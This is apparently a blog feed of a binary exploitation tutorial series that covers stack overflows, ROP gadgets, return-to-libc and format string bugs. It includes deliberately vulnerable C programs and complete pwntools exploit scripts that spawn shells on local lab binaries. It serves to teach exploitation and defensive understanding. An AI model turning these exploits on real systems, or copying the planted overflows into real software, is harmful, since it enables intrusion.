RSS Security


Binary Exploitation Series (4): Return to Libc

17 November 2018 at 00:00

This time we will enable the non-executable stack (NX) and build our first mini ROP chain to leak memory addresses! Basic ASLR is of course still enabled (the stack, heap and shared libraries are randomized; the non-PIE binary itself is not). I will also introduce some more features of pwntools.

Target

The target is again a simple binary where we can spot the vulnerability after a few seconds. In the function check_username we declare a 32-byte buffer to store a username. After that, we prompt the user for a name, but the fgets call reads up to 200 bytes, which again allows a buffer overflow.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//gcc -m64 -o chapter_4 chapter_4.c -no-pie -fno-stack-protector

void check_username() {
    char name[32];

    puts("Name?");
    fgets(name, 200, stdin);

    if(strcmp(name, "admin\n") == 0) {
        puts("Nope. Invalid username.");
    }
    else {
        puts("OK");
    }
}

int main(int argc, char **argv) {
    check_username();
    return 0;
}

Analysis

Since we know a little bit about pwntools, thanks to the last post, and we have the source code of the target, we can directly start writing our exploit. First, import all pwntools functions and load the binary.

from pwn import *

r = process("./chapter_4")
context.binary = './chapter_4'

Then we will attach the debugger gdb again …

# attach gdb and continue
gdb.attach(r.pid, """c""")

… and we trigger the buffer overflow with a simple payload.

payload = b"A"*50
r.sendline(payload)
r.interactive() # we don't want to close the application

Crashed, perfect!
Next, we try to find the offset to the return address on the stack. This can be done manually with static or dynamic analysis or we just use gdb and a really useful pwntools function. Let’s change the payload to payload = cyclic(50) and run it again. Crashed. Now we can compute the offset to the return address by taking a word (w) at the top of the stack (rsp) as an argument to pwntools’ cyclic_find function.

gef➤  x/wx $rsp
0x7ffecfec1e98:    0x6161616b

# ipython
In [1]: from pwn import *
In [2]: cyclic_find(0x6161616b)
Out[2]: 40

Ok, we have an offset of 40 to the return address of this function (32-byte buffer + 8 bytes for the saved base pointer).
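
For readers who wonder why cyclic_find can recover the offset from a single word: the pattern is a de Bruijn sequence, in which every 4-byte window occurs exactly once. The following is a minimal standard-library sketch of that idea, assuming the lowercase alphabet and a window length of 4 (which matches the value seen in gdb above); the helper names de_bruijn and find_offset are made up for this illustration and are not pwntools functions.

```python
import string
import struct


def de_bruijn(alphabet, n):
    """Build a de Bruijn sequence: every length-n window appears exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


# Assumption: lowercase alphabet, window length 4.
pattern = de_bruijn(string.ascii_lowercase, 4)


def find_offset(value):
    """Turn the 32-bit value read from the stack back into its position in the pattern."""
    needle = struct.pack("<I", value).decode("ascii")  # little endian, as in memory
    return pattern.find(needle)


print(pattern[:16])
print(find_offset(0x6161616b))
```

Because each window is unique, the position of the word found at rsp is exactly the number of bytes that precede the return address.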

Since we can’t execute our shellcode on the stack, we have to find another way. For now, we do the following steps to achieve code execution:

  • Leak libc pointers via GOT (Global Offset Table)
    • Leak pointer to puts
  • Identify libc library (optional, in this case not necessary)
    • Leak another pointer to fgets
    • Use leaked pointers of puts and fgets to find the correct libc
  • Compute libc’s base address
  • Find a suitable one-shot gadget to achieve code execution
  • Maybe find suitable gadgets to modify the registers for the one-shot gadget (in this case not necessary)
  • Redirect execution to the vulnerable function (otherwise the executable would exit)
  • Exploit the same vulnerability a second time and pop a shell!

First, we have to call the function puts with a GOT address as argument to read the pointer. pwntools can support us in our exploit development. Since we are exploiting the program locally, we can use ldd to find the libc in use.

# Find the used libc (obviously our local libc since this is a local challenge)
ldd ./chapter_4
        linux-vdso.so.1 (0x00007fffe21a6000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f37310e9000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f37314da000)

Next, we load the libc in our Python script for later use with libc = ELF("/lib/x86_64-linux-gnu/libc.so.6"), and we use pwntools features to call puts with the correct address. Since puts takes one argument, we have to set the rdi register, which holds the first argument in the x86-64 System V calling convention (Read more about calling conventions).

# find a suitable gadget to set rdi
ROPgadget --binary chapter_4 | grep rdi
0x00000000004006b3 : pop rdi ; ret      <--------------------------
0x0000000000400594 : scasd eax, dword ptr [rdi] ; or ah, byte ptr [rax] ; add byte ptr [rcx], al ; pop rbp ; ret

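We use the gadget to set the rdi register and call puts. This will print the content of the GOT entry, i.e. the address of puts in the mapped libc, and we can convert the leaked byte string to an integer with pwntools (u64(), 8-byte unpack). Because puts stops at the first null byte, only the significant bytes of the address are printed, so we strip the trailing newline and pad the leak to 8 bytes first. Then we just have to subtract the offset of puts in our local libc to get the base address of the mapped libc in memory.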

from pwn import *

def pad_null_bytes(value):
    return value + b'\x00' * (8-len(value))

chapter_4_elf = ELF("./chapter_4")
r = chapter_4_elf.process()
context.binary = './chapter_4'

# libc
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# attach gdb and continue
gdb.attach(r.pid, """c""")

payload = b"".join([b"A"*40,
    p64(0x00000000004006b3), # pop rdi ; ret
    p64(chapter_4_elf.got["puts"]), # value for rdi
    p64(chapter_4_elf.symbols["puts"]), # return address
    b"C"*50])

r.clean() # clean socket buffer (read all and print)
r.sendline(payload) # send payload
r.recvuntil(b"OK\n") # read until OK\n
puts_leak = u64(pad_null_bytes(r.readline()[:-1])) # remove newline + null byte padding + unpack to integer (8 byte)
log.info("Puts @ %s" % hex(puts_leak))

libc_base = puts_leak - libc.symbols["puts"] # compute libc base
log.info("libc base @ %s" % hex(libc_base))

r.interactive() # we don't want to close the application

Output of our script:

[+] Waiting for debugger: Done
[*] Puts @ 0x7f97bd13f9c0
[*] libc base @ 0x7f97bd0bf000      <----
[*] Switching to interactive mode

# Verify puts in gdb
p puts
$1 = {int (const char *)} 0x7f97bd13f9c0 <_IO_puts>   <----

# Verify libc base with vmmap
0x00007f97bd0bf000 0x00007f97bd2a6000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.27.so   <----
0x00007f97bd2a6000 0x00007f97bd4a6000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007f97bd4a6000 0x00007f97bd4aa000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007f97bd4aa000 0x00007f97bd4ac000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/libc-2.27.so

Perfect, the addresses are the same!
If we don’t know the libc version, we have to leak further addresses such as fgets and strcmp and use blukat.me to identify the correct version. Once we have found the correct one, we can download the libc from the website. Since we do everything locally, we can skip this part.
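
The unpack-and-subtract step of the leak can also be reproduced without pwntools. The sketch below uses only the standard library and replays the values from the run shown above; the offset of puts is simply the difference between the two addresses in that output, and the helper name unpack_leak is invented for this example.

```python
import struct


def unpack_leak(line):
    """Strip the newline that puts appends, pad to 8 bytes, unpack as little endian."""
    leak = line[:-1] if line.endswith(b"\n") else line
    return struct.unpack("<Q", leak.ljust(8, b"\x00"))[0]


# What the process printed after "OK\n" in the run above (0x7f97bd13f9c0).
raw_line = b"\xc0\xf9\x13\xbd\x97\x7f\n"

# Offset of puts inside that libc: 0x7f97bd13f9c0 - 0x7f97bd0bf000.
PUTS_OFFSET = 0x809c0

puts_addr = unpack_leak(raw_line)
libc_base = puts_addr - PUTS_OFFSET

print(hex(puts_addr))
print(hex(libc_base))
```

A quick sanity check for any computed base is that its lowest 12 bits are zero, because libraries are mapped page-aligned.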

Before we look for a one-shot gadget, we need a way to interact with the binary after receiving the leaked addresses because ASLR would randomize the addresses on every startup again. Therefore, we just redirect the execution flow to the beginning and just exploit the buffer overflow a second time.

payload = b"".join([b"A"*40,
    p64(0x00000000004006b3), # pop rdi ; ret
    p64(chapter_4_elf.got["puts"]), # value for rdi
    p64(chapter_4_elf.symbols["puts"]), # return address
    p64(chapter_4_elf.symbols["main"]), # return to main
    b"C"*50])

-->

Output:
[*] Puts @ 0x7f0fa54599c0
[*] libc base @ 0x7f0fa53d9000
[*] Switching to interactive mode
Name?
$  

Just copy the payload and send it again and we see the same crash as at the beginning!
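
To see how the chain sits on the stack, it can help to print it slot by slot. This is a small standard-library sketch; only the pop rdi gadget address comes from the ROPgadget output above, while PUTS_GOT, PUTS_PLT and MAIN are placeholder values (in the real exploit pwntools looks them up in the ELF).

```python
import struct

OFFSET_TO_RET = 40            # found with cyclic_find above

POP_RDI_RET = 0x4006b3        # from the ROPgadget output
PUTS_GOT = 0x601018           # placeholder, hypothetical value
PUTS_PLT = 0x4004f0           # placeholder, hypothetical value
MAIN = 0x400637               # placeholder, hypothetical value

slots = [
    (POP_RDI_RET, "overwritten return address: pop rdi ; ret"),
    (PUTS_GOT, "popped into rdi: address of the GOT entry of puts"),
    (PUTS_PLT, "the gadget's ret lands here: puts(rdi) prints the leak"),
    (MAIN, "puts returns here: main runs a second time"),
]

chain = b"A" * OFFSET_TO_RET + b"".join(struct.pack("<Q", v) for v, _ in slots)

for index, (value, meaning) in enumerate(slots):
    print("payload+%2d: 0x%016x  %s" % (OFFSET_TO_RET + 8 * index, value, meaning))
```

Each ret consumes the next 8-byte slot, which is why the order of the entries in the payload is the order of execution.
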
Next, we have to identify a one-shot gadget. For that, we can use the program one_gadget with the identified libc.

one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c        execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

Ok, we have some constraints…
If we take a look at the stack in gdb after the program crashed, we can see that the second gadget should work with its constraints, because we control the C’s (0x43).

x/gx $rsp+0x40
0x7ffcc4538c98:    0x4343434343434343

-> change "C"*50 to "\x00"*100 and start the script again

x/gx $rsp+0x40
0x7ffe6cdff488:    0x0000000000000000
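
The same check can be done offline. After the overwritten return address has been popped, rsp points at the byte directly behind it, so [rsp+0x40] corresponds to a fixed position in our input. The sketch below assumes the offset of 40 found earlier and uses the libc base from one of the runs above purely as an example value (it changes on every start).

```python
import struct

OFFSET_TO_RET = 40
ONE_GADGET = 0x4f322                 # second candidate from the one_gadget output
EXAMPLE_LIBC_BASE = 0x7f0fa53d9000   # example value from a run above

payload2 = (b"A" * OFFSET_TO_RET
            + struct.pack("<Q", EXAMPLE_LIBC_BASE + ONE_GADGET)
            + b"\x00" * 100)

rsp_after_ret = OFFSET_TO_RET + 8            # position in the payload that rsp points to
constraint_pos = rsp_after_ret + 0x40        # position of [rsp+0x40]
qword = payload2[constraint_pos:constraint_pos + 8]

print(constraint_pos, qword == b"\x00" * 8, len(payload2))
```

The null bytes are not a problem for the input function: fgets only stops at a newline or at the size limit, and the whole payload stays below the 200-byte limit.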

Let’s try it..

payload2 = b"".join([b"A"*40,
    p64(libc_base + one_gadget), # pop a shell
    b"\x00"*100])

gef➤  c
Continuing.
process 9645 is executing new program: /bin/dash

We got it!

[+] Waiting for debugger: Done
[*] Puts @ 0x7f88bec589c0
[*] libc base @ 0x7f88bebd8000
[*] Switching to interactive mode
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"sΒΎ\x88\x7f
OK
$ ls
chapter_4  chapter_4.c    chapter_4_exploit.py

Final exploit:

from pwn import *

def pad_null_bytes(value):
    return value + b'\x00' * (8-len(value))

chapter_4_elf = ELF("./chapter_4")
r = chapter_4_elf.process()
context.binary = './chapter_4'

# libc
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# attach gdb and continue
gdb.attach(r.pid, """c""")
"""
one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c        execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""
one_gadget = 0x4f322

payload = b"".join([b"A"*40,
    p64(0x00000000004006b3), # pop rdi ; ret
    p64(chapter_4_elf.got["puts"]), # value for rdi
    p64(chapter_4_elf.symbols["puts"]), # return address
    p64(chapter_4_elf.symbols["main"]), # return to main
    b"C"*50])

r.clean()
r.sendline(payload)
r.recvuntil(b"OK\n")
puts_leak = u64(pad_null_bytes(r.readline()[:-1])) # remove newline + null byte padding + unpack to integer (8 byte)
log.info("Puts @ %s" % hex(puts_leak))

libc_base = puts_leak - libc.symbols["puts"]
log.info("libc base @ %s" % hex(libc_base))

payload2 = b"".join([b"A"*40,
    p64(libc_base + one_gadget), # pop a shell
    b"\x00"*100])

r.clean()
r.sendline(payload2)

r.interactive() # we don't want to close the application

Please be patient with yourself and learn slowly, so that you understand everything correctly.

Happy Hacking!

Binary Exploitation Series (3): Your first Exploit

16 November 2018 at 00:00

Our first target is a really simple binary with basic ASLR enabled (the stack, heap and shared libraries are randomized; the non-PIE binary itself is not). For this example, we will disable other protections like non-executable memory regions or PIE to make our stack overflow easier.

Target

The following code snippet is a simple C program that reads up to 200 bytes from stdin into a buffer of only 16 bytes. Therefore, we can write out of bounds. We compile the target with an executable stack and no other protections. Note that ASLR is enabled, because this is the default on most of today’s operating systems.

#include <stdio.h>
#include <stdlib.h>

//gcc -m64 -o chapter_3 chapter_3.c -no-pie -fno-stack-protector -z execstack -masm=intel
// help function to make this task easier, ignore it
void help() {
    asm("jmp rsp");
}

int main(int argc, char **argv) {
    char buffer[16];                   // 16 byte buffer
    fgets(buffer, 200, stdin);         // bug, we'll read 200 bytes into a 16 byte buffer
    return 0;                          // triggers return / return address is overflowed
}

Analysis

First, we load the binary into gdb.

gdb -q ./chapter_3
Reading symbols from ./chapter_3...(no debugging symbols found)...done.
gef➤  checksec # to check if there are any protections
[+] checksec for '/BinaryExploitationSeries/Chapter 3/chapter_3'
Canary                        : No
NX                            : No
PIE                           : No
Fortify                       : No
RelRO                         : Partial
gef➤  disassemble main
Dump of assembler code for function main:
   0x0000000000400527 <+0>:     push   rbp
   0x0000000000400528 <+1>:     mov    rbp,rsp
   0x000000000040052b <+4>:     sub    rsp,0x20
   0x000000000040052f <+8>:     mov    DWORD PTR [rbp-0x14],edi # arg1 argc
   0x0000000000400532 <+11>:    mov    QWORD PTR [rbp-0x20],rsi # arg2 argv
   0x0000000000400536 <+15>:    mov    rdx,QWORD PTR [rip+0x200af3]        # 0x601030 <stdin@@GLIBC_2.2.5>
   0x000000000040053d <+22>:    lea    rax,[rbp-0x10] # buffer
   0x0000000000400541 <+26>:    mov    esi,0xc8 # count = 200
   0x0000000000400546 <+31>:    mov    rdi,rax
   0x0000000000400549 <+34>:    call   0x400430 <fgets@plt>
   0x000000000040054e <+39>:    mov    eax,0x0 # return value = 0
   0x0000000000400553 <+44>:    leave  
   0x0000000000400554 <+45>:    ret    
End of assembler dump.

We can see at main+22 that our buffer is located at rbp-0x10 and is passed as the first argument to fgets. Let’s try to overflow the buffer. For the payload generation we will use ipython.

Payload in ipython:
In [1]: "A"*16+"B"*8+"C"*8
Out[1]: 'AAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC' # our payload
gef➤  run
Starting program: /BinaryExploitationSeries/Chapter 3/chapter_3
AAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC # our payload
...
[#0] Id 1, Name: "chapter_3", stopped, reason: SIGSEGV # binary crashed

gef➤  x/gx $rbp
0x4242424242424242 # rbp is overwritten with B's

gef➤  x/gx $rsp # show a giant word (64-bit value) at $rsp (stack pointer)
0x7fffffffddb8:    0x4343434343434343
# the binary tried to return to 8x C's, which faults because x86-64 only accepts canonical addresses:
# only the lower 6 bytes (48 bits) are used to address an instruction, e.g. 0x0000414141414141
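
The rule behind this crash can be written down in a few lines. The sketch assumes the common 48-bit virtual address layout (systems with 5-level paging use more bits), and is_canonical is a name chosen for this example only: an address is accepted if bits 47 to 63 are all equal.

```python
def is_canonical(addr):
    """True if bits 47..63 of a 64-bit address are all zeros or all ones."""
    top = (addr >> 47) & 0x1FFFF   # the 17 bits from bit 47 upwards
    return top == 0 or top == 0x1FFFF


for addr in (0x4343434343434343, 0x0000414141414141, 0x00000a4343434343):
    print("0x%016x canonical: %s" % (addr, is_canonical(addr)))
```

This is why a return address made of eight C's faults on the ret itself, while a shorter overwrite that leaves the two upper bytes at zero actually ends up in rip.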

Let’s change the return address to a valid value.

Payload: AAAAAAAAAAAAAAAABBBBBBBBCCCCC # we only send 5x C's because we have a newline (0x0a) at the end
# we can get rid of the newline if we directly use python or pipe from a file

[#0] Id 1, Name: "chapter_3", stopped, reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x00000a4343434343 in ?? ()

# Now we have redirected execution to 0xa4343434343 which is an invalid address.
# We can verify the redirection with
gef➤  x/gx $rip
0xa4343434343

For the next steps, we put a breakpoint on the return instruction of the main to see our stack layout before returning.

b *main+45

Additionally, we provide some more data on the stack to have a better understanding of the data in the registers and on the stack.

New Payload: "A"*16+"B"*8+"C"*8+"D"*100

$rax   : 0x0               
$rbx   : 0x0               
$rcx   : 0x4444444444444444 ("DDDDDDDD"?)
$rdx   : 0x7ffff7dd18d0      →  0x0000000000000000
$rsp   : 0x7fffffffddb8      →  "CCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
$rbp   : 0x4242424242424242 ("BBBBBBBB"?)
$rsi   : 0x7fffffffdda0      →  "AAAAAAAAAAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDDDDDDDDDDD[...]"
$rdi   : 0x7fffffffde25      →  0x0000000000000000
$rip   : 0x40055d            →  <main+45> ret
$r8    : 0x6022e5            →  0x0000000000000000
$r9    : 0x4444444444444444 ("DDDDDDDD"?)
$r10   : 0x4444444444444444 ("DDDDDDDD"?)
$r11   : 0x4444444444444444 ("DDDDDDDD"?)
$r12   : 0x400440            →  <_start+0> xor ebp, ebp
$r13   : 0x7fffffffde90      →  0x0000000000000001
$r14   : 0x0               
$r15   : 0x0               
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$gs: 0x0000  $ss: 0x002b  $cs: 0x0033  $es: 0x0000  $fs: 0x0000  $ds: 0x0000  
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]────
0x00007fffffffddb8β”‚+0x00: "CCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"     ← $rsp
0x00007fffffffddc0β”‚+0x08: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffddc8β”‚+0x10: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffddd0β”‚+0x18: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffddd8β”‚+0x20: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffdde0β”‚+0x28: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffdde8β”‚+0x30: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffddf0β”‚+0x38: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]────
     0x400552 <main+34>        call   0x400430 <fgets@plt>
     0x400557 <main+39>        mov    eax, 0x0
     0x40055c <main+44>        leave  
 →   0x40055d <main+45>        ret    
[!] Cannot disassemble from $PC
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "chapter_3", stopped, reason: BREAKPOINT

Before you read any further, make sure you understand what ASLR (Address Space Layout Randomization) and NX (No-eXecute, i.e. a non-executable stack) mean.

Since we have an executable stack, we can put our shellcode directly on the stack. The problem is that ASLR is still enabled and therefore we can’t reliably know where our shellcode is placed. To solve this problem, we can use a so-called gadget. Gadgets are short instruction sequences in an executable section (in general the .text section) that always end with a ret/jmp instruction (an instruction which redirects the execution flow).
For example:

Gadget1:
pop rdx # pull an 8-byte value from the top of the stack
ret # return

Gadget2:
mov rax, rsi
jmp rax

Now, the idea is, that we can use these gadgets for our purpose. If we place the address of gadget1 as the return address of our function we can redirect the execution flow to this gadget.
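
To make the mechanics concrete, here is a toy model of how chained gadgets consume the stack. It is a deliberately tiny sketch that only understands "pop <reg>" and "ret"; the gadget addresses 0x1000 and 0x2000 and the function name run_chain are invented for the illustration and have nothing to do with the real binary.

```python
import struct


def run_chain(stack, gadgets, entry, max_steps=16):
    """Interpret 'pop <reg>' and 'ret' over a byte string that stands in for the stack."""
    regs, trace = {}, []
    sp, rip = 0, entry
    for _ in range(max_steps):
        if rip not in gadgets:          # we left the known gadgets: stop the model
            break
        trace.append(rip)
        for insn in gadgets[rip]:
            value = struct.unpack_from("<Q", stack, sp)[0]   # both instructions pop 8 bytes
            sp += 8
            if insn == "ret":
                rip = value             # ret: popped value becomes the instruction pointer
            else:
                regs[insn.split()[1]] = value   # pop reg: popped value goes into reg
    return regs, trace, rip


# Hypothetical gadget addresses, for illustration only.
gadgets = {
    0x1000: ["pop rdx", "ret"],
    0x2000: ["pop rdi", "ret"],
}

# Stack content directly behind the overwritten return address (which holds 0x1000).
stack = struct.pack("<4Q", 0x1111, 0x2000, 0x2222, 0xdeadbeef)

regs, trace, final_rip = run_chain(stack, gadgets, entry=0x1000)
print(regs, [hex(a) for a in trace], hex(final_rip))
```

The attacker never injects instructions in this model; the data on the stack alone decides which existing instructions run next and with which register values.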

Where do we find these gadgets?
We could use manual analysis of the binary to find suitable gadgets but we can also do this automatically with ropper or ROPgadget.

For this target, we need a gadget that redirects the execution flow to our buffer (best case our D’s on the stack). If we look carefully, we can see that the jmp rsp gadget of our help function is available. This gadget is perfect, because after we triggered the overflow via ret the rsp register points to the first byte of our payload after the return address which is, in fact, the first D.

ROPgadget --binary chapter_3 | grep jmp
0x000000000040049e : adc byte ptr [rax], ah ; jmp rax
0x000000000040060d : add byte ptr [rax], al ; add byte ptr [rdi + rdi*8 - 1], cl ; jmp rsp
0x000000000040060f : add byte ptr [rdi + rdi*8 - 1], cl ; jmp rsp
0x000000000040060b : inc esp ; add byte ptr [rax], al ; add byte ptr [rdi + rdi*8 - 1], cl ; jmp rsp
0x0000000000400499 : je 0x4004b0 ; pop rbp ; mov edi, 0x601030 ; jmp rax
0x00000000004004db : je 0x4004f0 ; pop rbp ; mov edi, 0x601030 ; jmp rax
0x000000000040068b : jmp qword ptr [rax]
0x00000000004004a1 : jmp rax
0x000000000040052b : jmp rsp            <--------
0x0000000000400526 : mov dword ptr [rbp + 0x48], edx ; mov ebp, esp ; jmp rsp
0x0000000000400529 : mov ebp, esp ; jmp rsp
0x000000000040049c : mov edi, 0x601030 ; jmp rax
0x0000000000400528 : mov rbp, rsp ; jmp rsp
0x000000000040049b : pop rbp ; mov edi, 0x601030 ; jmp rax
0x0000000000400527 : push rbp ; mov rbp, rsp ; jmp rsp

Let’s write our first exploit:

from pwn import *

r = process("./chapter_3")
context.binary = './chapter_3'

# attach gdb and continue
gdb.attach(r.pid, """c""")

gadget = 0x000000000040052b # jmp rsp

payload = b"A"*16+b"B"*8
payload += p64(gadget) # return address, p64 converts our address to little endian because that's the correct representation in memory
# \xcc -> is a software breakpoint (int3). If our redirection of the execution worked, we should break
payload += b"\xcc"*100

r.sendline(payload)
r.interactive() # we don't want to close the application

We can see in gdb that the target raised a SIGTRAP while executing our buffer. Our gadget worked!
Now we just have to replace our buffer with real shellcode. This is very easy with pwntools because it ships with ready-made shellcode.

from pwn import *

r = process("./chapter_3")
context.binary = './chapter_3'

# attach gdb and continue
gdb.attach(r.pid, """c""")

gadget = 0x000000000040052b # jmp rsp

payload = b"A"*16+b"B"*8
payload += p64(gadget) # return address, p64 converts our address to little endian because that's the correct representation in memory
# \xcc -> is a software breakpoint (int3). If our redirection of the execution worked, we should break
# payload += b"\xcc"*100
payload += asm(shellcraft.sh()) # shellcode to spawn a shell

r.sendline(payload)
r.interactive() # we don't want to close the application

python chapter_3_exploit.py
[+] Starting local process './chapter_3': pid 5622
[*] '/BinaryExploitationSeries/Chapter 3/chapter_3'
   Arch:     amd64-64-little
   RelRO:    Partial RelRO
   Stack:    No canary found
   NX:       NX disabled
   PIE:      No PIE (0x400000)
   RWX:      Has RWX segments
[*] running in new terminal: /usr/bin/gdb -q  "/BinaryExploitationSeries/Chapter 3/chapter_3" 5622 -x "/tmp/pwne4TDcJ.gdb"
[+] Waiting for debugger: Done
[*] Switching to interactive mode
$ ls
chapter_3  chapter_3.c    chapter_3_exploit.py
$  

Yeah, we popped our first shell!


The next post will be about bypassing non-executable stack aka return to libc and a small information leak.
Happy Hacking!

Binary Exploitation Series (2): Bug Classes

15 November 2018 at 00:00

This post gives a brief overview of some bug classes, but it will not cover everything in detail. I’ll provide some additional resources for bug classes which I’m not covering in this series.

How to find vulnerabilities?

There are two essential ways to identify vulnerabilities in software: fuzzing and static/dynamic code analysis. While fuzzing is a more “aggressive” way of throwing many different test cases at the program, an audit is a more focused task. In CTFs I prefer manual analysis of the target, because most of the time bugs are somewhat hidden and you can find a magic value more easily with a disassembler than with random inputs as test cases.

Bug Classes

There are many different possible attack vectors in today’s native binaries. I won’t cover all of them but to give you an idea, here is a small list:

  • Stack Buffer Overflows
  • Heap Buffer Overflows
  • Format String Attacks
  • Use After Free (UAF)
  • Information Leaks (e.g. Format String Attacks, Off by One)
  • Logic Flaws
  • …

Stack Based Buffer Overflows

Stack-based buffer overflows are (often) a simple way to get code execution on the target. The best way to explain such an attack is with an example, like always. ;-)
For the following function we assume a 32-bit architecture.

void vuln_function(char *input) {
    char local_buffer[32];
    strcpy(local_buffer, input);
}

The main idea of a buffer overflow is that we can write out of bounds of a variable e.g. an array. This means, that we can fill a buffer on the stack (here 32 bytes) with more data than it can store.

In the following figure, we see the stack of the above function. ESP is the stack pointer and EBP is the base pointer.

If we have “AAAA\0” as an input, the stack is as follows:

If we put more data than the buffer can hold (e.g. "A"*32 + "B"*4 + "C"*4) we can overwrite the saved base pointer and the return address of the function.

As soon as we return from the function (ret), the C’s will be used as the next instruction pointer and we get a segmentation fault. Therefore, we know that something is corrupted and we may have control of the execution flow (without protections enabled, see later chapters). It is important to note that you could overwrite other variables too. That means you may not need to overwrite the return address at all, because overwriting a specific variable on the stack is enough to achieve your goal.
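
The stack layout described above can be modelled in a few lines of Python. This is only a sketch of the frame [local_buffer | saved EBP | return address] with a strcpy-like copy on top of it; the initial values for the saved base pointer and the return address are made-up placeholders, and overflow_frame is a name chosen for this example.

```python
import struct

BUF_SIZE = 32


def overflow_frame(user_input, saved_ebp=0xffffd0e8, ret_addr=0x08048456):
    """Return (saved EBP, return address) after copying user_input into the buffer."""
    # 32-byte buffer followed by two 4-byte values (placeholder defaults, 32-bit).
    frame = bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, ret_addr)
    # strcpy copies up to the first null byte and writes the terminator as well.
    copied = user_input.split(b"\x00")[0] + b"\x00"
    if len(copied) > len(frame):
        frame.extend(bytes(len(copied) - len(frame)))   # bytes beyond the modelled frame
    frame[:len(copied)] = copied
    return struct.unpack_from("<II", frame, BUF_SIZE)


for data in (b"AAAA\x00", b"A" * 32 + b"B" * 4 + b"C" * 4):
    ebp, ret = overflow_frame(data)
    print("saved EBP = 0x%08x, return address = 0x%08x" % (ebp, ret))
```

With exactly 32 A's only the terminating null byte spills over and clears the lowest byte of the saved base pointer, which is the off-by-one case mentioned in the list of bug classes.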

Heap Exploitation

Heap-based buffer overflows are in general the same as stack-based buffer overflows, but you are overflowing a buffer on the heap. Therefore, you cannot directly overwrite e.g. a return address but rather have to figure out how the application works. Then you can manipulate other variables like pointers to strings (which may give you a read/write primitive), heap metadata and even function pointers on the heap (e.g. a struct which has pointers to other functions) to get control over the execution flow.
I can recommend How2Heap which covers a lot of heap exploitation techniques.

Format String Attacks

Format strings can be used in a few functions like printf.

char *name = "MyName";
int age = 34;
printf("%s is %d years old.", name, age);

In this example, we have a format string (arg1) and we replace the %s with the content of the second argument name and the %d formatter with the value of age. The vulnerability occurs if we let the user manipulate or even set the format string.
For example:

char buf[30];
int count = read(0, buf, 29);
buf[count] = '\0';
printf(buf); // buffer could contain formatter -> %x %s %c ...

When we pass the string %x%x%x as the buffer to printf, we can leak data from the stack. We can also read from and write to arbitrary addresses in memory. You can read more about this type of exploitation at Format String Attacks syr.edu or watch a video of LiveOverflow.
Look out for functions like: printf, sprintf, vprintf, vsprintf, ….


That’s it for today. Next time, we’ll finally exploit our first target!

See you soon.

Binary Exploitation Series (1): Environment Setup

8 November 2018 at 00:00

Foreword

This series will cover some basic exploitation techniques on Linux systems (x64) which are getting more advanced during the series. The main focus will be on bypassing protection mechanisms of modern systems like ASLR, non-executable stack, Stack Cookies and position-independent code. Each technical topic will be hands-on and I will provide an example to try it yourself and follow along.

Overview

The following table shows some topics I will write about and it might be updated over time.

Chapter  Topic                    Active Protections
1        Environment Setup        -
2        Bug Classes              -
3        Your first Exploit       ASLR
4        Return 2 Libc            ASLR, NX
5        How to leak data?        Mixed
6        Defeating Stack Cookies  ASLR, NX, Stack Cookies
7        Full RelRO Bypass        ASLR, NX, Stack Cookies, Full RelRO

Introduction

